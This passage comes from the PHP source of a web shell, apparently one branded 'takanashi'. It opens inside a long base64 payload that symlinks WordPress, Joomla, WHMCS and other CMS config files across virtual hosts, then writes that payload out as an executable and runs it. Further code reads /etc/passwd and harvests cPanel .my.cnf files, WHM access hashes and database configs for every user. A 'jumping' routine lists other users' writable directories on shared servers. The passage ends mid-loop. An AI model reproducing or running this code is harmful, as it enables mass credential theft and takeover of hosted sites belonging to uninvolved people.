29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
605. $file = "takanashi_config/vhost.cin";
606. $handle = fopen($file ,"w+");
607. fwrite($handle ,base64_decode($vhost));
608. fclose($handle);
609. chmod($file, 0755);
610. if(exe("cd takanashi_config && ./vhost.cin")) {
611. echo "<center><a href='$link_config/takanashi_config'><font color=Yellow>Done</font></a></center>";
612. } else {
613. echo "<center><a href='$link_config/takanashi_config/vhost.cin'><font color=Yellow>Done</font></a></center>";
614. }
615.  
616. } else {
617. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
618. while($passwd = fgets($etc)) {
619. if($passwd == "" || !$etc) {
620. echo "<font color=red>Can't read /etc/passwd</font>";
621. } else {
622. preg_match_all('/(.*?):x:/', $passwd, $user_config);
623. foreach($user_config[1] as $user_idx) {
624. $user_config_dir = "/home/$user_idx/public_html/";
625. if(is_readable($user_config_dir)) {
626. $grab_config = array(
627. "/home/$user_idx/.my.cnf" => "cpanel",
628. "/home/$user_idx/.accesshash" => "WHM-accesshash",
629. "$user_config_dir/po-content/config.php" => "Popoji",
630. "$user_config_dir/vdo_config.php" => "Voodoo",
631. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
632. "$user_config_dir/config/koneksi.php" => "Lokomedia",
633. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
634. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
635. "$user_config_dir/whm/configuration.php" => "WHMCS",
636. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
637. "$user_config_dir/forum/config.php" => "phpBB",
638. "$user_config_dir/sites/default/settings.php" => "Drupal",
639. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
640. "$user_config_dir/app/etc/local.xml" => "Magento",
641. "$user_config_dir/joomla/configuration.php" => "Joomla",
642. "$user_config_dir/configuration.php" => "Joomla",
643. "$user_config_dir/wp/wp-config.php" => "WordPress",
644. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
645. "$user_config_dir/wp-config.php" => "WordPress",
646. "$user_config_dir/admin/config.php" => "OpenCart",
647. "$user_config_dir/slconfig.php" => "Sitelok",
648. "$user_config_dir/application/config/database.php" => "Ellislab");
649. foreach($grab_config as $config => $nama_config) {
650. $ambil_config = file_get_contents($config);
651. if($ambil_config == '') {
652. } else {
653. $file_config = fopen("takanashi_config/$user_idx-$nama_config.txt","w");
654. fputs($file_config,$ambil_config);
655. }
656. }
657. }
658. }
659. }
660. }
661. echo "<center><a href='?dir=$dir/takanashi_config'><font color=Yellow>Done</font></a></center>";
662. }
663. } elseif($_GET['do'] == 'jumping') {
664. $i = 0;
665. echo "<div class='margin: 5px auto;'>";
666. if(preg_match("/hsphere/", $dir)) {
667. $urls = explode("\r\n", $_POST['url']);
668. if(isset($_POST['jump'])) {
669. echo "<pre>";
670. foreach($urls as $url) {
671. $url = str_replace(array("http://","www."), "", strtolower($url));
672. $etc = "/etc/passwd";
673. $f = fopen($etc,"r");
674. while($gets = fgets($f)) {
675. $pecah = explode(":", $gets);
676. $user = $pecah[0];
677. $dir_user = "/hsphere/local/home/$user";
678. if(is_dir($dir_user) === true) {
679. $url_user = $dir_user."/".$url;
680. if(is_readable($url_user)) {
681. $i++;
682. $jrw = "[<font color=Yellow>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
683. if(is_writable($url_user)) {
684. $jrw = "[<font color=Yellow>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
685. }
686. echo $jrw."<br>";
687. }
688. }
689. }
690. }
691. if($i == 0) {
692. } else {
693. echo "<br>Total ada ".$i." jembud di ".$ip;
694. }
695. echo "</pre>";
696. } else {
697. echo '<center>
698. <form method="post">
699. List Domains: <br>
700. <textarea name="url" style="width: 500px; height: 250px;">';
701. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
702. while($getss = fgets($fp)) {
703. echo $getss;
704. }
705. echo '</textarea><br>
706. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
707. </form></center>';
708. }
709. } elseif(preg_match("/vhosts|vhost/", $dir)) {
710. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
711. $urls = explode("\r\n", $_POST['url']);
712. if(isset($_POST['jump'])) {
713. echo "<pre>";
714. foreach($urls as $url) {
